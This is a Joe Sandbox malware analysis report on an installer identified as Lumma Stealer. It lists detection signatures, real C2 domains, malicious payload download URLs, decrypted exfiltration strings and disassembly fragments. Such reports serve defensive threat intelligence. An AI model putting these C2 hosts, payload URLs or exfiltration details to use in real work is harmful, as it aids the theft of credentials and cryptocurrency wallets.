Edit tour

Windows Analysis Report
Exlan_setup_v3.1.2.exe

Overview

General Information

Sample name:	Exlan_setup_v3.1.2.exe
Analysis ID:	1582636
MD5:	f86e00a8bf2edc5379395d27f517a170
SHA1:	98362ae7984b73aa461ca2aeeed2acc08aa0cc73
SHA256:	55167bd32c236720792dbcd9318114b75ac5784c7c8be5f82b1f515aefcbf281
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Exlan_setup_v3.1.2.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe" MD5: F86E00A8BF2EDC5379395D27F517A170)

Exlan_setup_v3.1.2.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe" MD5: F86E00A8BF2EDC5379395D27F517A170)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["bashfulacid.lat", "justyffyr.click", "shapestickyr.lat", "manyrestro.lat", "tentabatte.lat", "slipperyloo.lat", "talkynicer.lat", "curverpluch.lat", "wordyfindy.lat"], "Build id": "Dvh8ui--n9"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1694937344.0000000006110000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1690736705.0000000004273000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Exlan_setup_v3.1.2.exe PID: 7556	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Exlan_setup_v3.1.2.exe PID: 7556	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.Exlan_setup_v3.1.2.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.Exlan_setup_v3.1.2.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.Exlan_setup_v3.1.2.exe.6110000.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:59.212413+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.102.49.254	443	TCP
2024-12-31T08:17:00.303204+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-31T08:17:01.216272+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-31T08:17:02.367366+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-31T08:17:03.461424+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.157.254	443	TCP
2024-12-31T08:17:04.941363+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-31T08:17:06.997816+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.157.254	443	TCP
2024-12-31T08:17:08.210286+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.157.254	443	TCP
2024-12-31T08:17:10.178847+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:17:00.751841+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-31T08:17:01.690112+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-31T08:17:10.636111+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:17:00.751841+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:17:01.690112+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.451780+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.4	55027	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.415781+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.4	61574	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (justyffyr .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:57.264869+0100	2058614	1	Domain Observed Used for C2 Detected	192.168.2.4	63242	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.344235+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.4	62830	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.354648+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.4	50967	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.332626+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.4	49566	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.403423+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.4	59596	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.425775+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.4	56480	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:58.294702+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.4	63726	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:17:03.923655+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49734	172.67.157.254	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:16:59.732242+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cialis26.us:443/file/nixsudocrypt.exe	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiC:	Avira URL Cloud: Label: malware
Source: justyffyr.click	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apin.txtPK	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/L	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apir	Avira URL Cloud: Label: malware
Source: https://cialis26.us/file/nixsudocrypt.exe	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apis92o4p.default-release/key4.dbPK	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.Exlan_setup_v3.1.2.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "justyffyr.click", "shapestickyr.lat", "manyrestro.lat", "tentabatte.lat", "slipperyloo.lat", "talkynicer.lat", "curverpluch.lat", "wordyfindy.lat"], "Build id": "Dvh8ui--n9"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 85.4% probability

Machine Learning detection for sample

Source: Exlan_setup_v3.1.2.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: justyffyr.click
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Dvh8ui--n9

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFFDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	0_2_6CFFDBB0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFFDD20 CryptReleaseContext,	0_2_6CFFDD20
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFFDEE0 CryptReleaseContext,	0_2_6CFFDEE0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFFDE00 CryptGenRandom,__CxxThrowException@8,	0_2_6CFFDE00
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6CFFD9D0 CryptAcquireContextA,GetLastError,	0_2_6CFFD9D0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00415410 CryptUnprotectData,	1_2_00415410

Source: Exlan_setup_v3.1.2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: Exlan_setup_v3.1.2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: Exlan_setup_v3.1.2.exe, Protect544cd51a.dll.0.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695672104.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695672104.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: Exlan_setup_v3.1.2.exe

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp ecx	1_2_004180B2
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+67DC0B6Eh]	1_2_0043F140
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ebx, edi	1_2_0040CADF
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [edi], bl	1_2_0040CADF
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+67DC0B52h]	1_2_0043F3F0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh	1_2_004263B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov esi, ecx	1_2_00415410
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1Fh]	1_2_0042C4C9
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov dword ptr [esp+08h], esi	1_2_0042C4C9
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_0042C4C9
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov esi, eax	1_2_0043C4A8
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then lea ebx, dword ptr [edx+62h]	1_2_0040D4B9
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov esi, edx	1_2_004085C0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	1_2_0043DDE0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov esi, eax	1_2_0042BE6F
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esi]	1_2_0042BE6F
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ecx, eax	1_2_0042BE6F
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edi, ecx	1_2_0043A600
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi-651786D2h]	1_2_0040A6B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+50h]	1_2_00423750
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx eax, byte ptr [esi+edx+4B75982Fh]	1_2_0040AF1B
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edx, ecx	1_2_0040D780
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00428859
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	1_2_00428859
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp dword ptr [00445A1Ch]	1_2_00428859
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp eax	1_2_0041807C
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00434000
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx eax, byte ptr [esi+edi]	1_2_0043B806
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	1_2_00419157
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	1_2_0041E970
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00426977
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ebx, edx	1_2_00417913
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov dword ptr [esp+04h], edx	1_2_0041892C
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	1_2_004189FC
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	1_2_0041D240
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042B230
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edi, edx	1_2_00419AF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	1_2_00419AF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+00000130h]	1_2_00416B5A
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edx, ebp	1_2_0043D3E0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-7AF59787h]	1_2_004293E7
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then test eax, eax	1_2_004383A0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edi, ecx	1_2_00414BA8
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp dword ptr [00443F84h]	1_2_00414BA8
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edi, edx	1_2_00414BA8
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00402BB0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edx, ecx	1_2_0043D3B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	1_2_00409440
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_00407410
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_00407410
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp al, 22h	1_2_004294CC
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	1_2_0043ACF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], E785F9BAh	1_2_00425C90
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh	1_2_00425C90
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000000A4h]	1_2_0042ACA0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [esi], dl	1_2_0042ACA0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ebx, edi	1_2_0041DD40
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	1_2_0042757C
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edx, ecx	1_2_004185C3
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+67DC0B52h]	1_2_0043F5B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp-38h]	1_2_00414E41
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov eax, edx	1_2_00414670
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ecx, esi	1_2_00414670
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	1_2_00427E27
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp ecx	1_2_0040CE98
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi+06h]	1_2_004226B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	1_2_00426740
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00429F50
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then jmp ecx	1_2_00426760
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov esi, eax	1_2_0042BE6A
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esi]	1_2_0042BE6A
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ecx, eax	1_2_0042BE6A
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0041B775
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movsx edi, byte ptr [eax]	1_2_0043CF0D
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then movsx ecx, byte ptr [eax+ebx]	1_2_0043CF0D
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov edx, eax	1_2_0041BF29
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B730
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B669
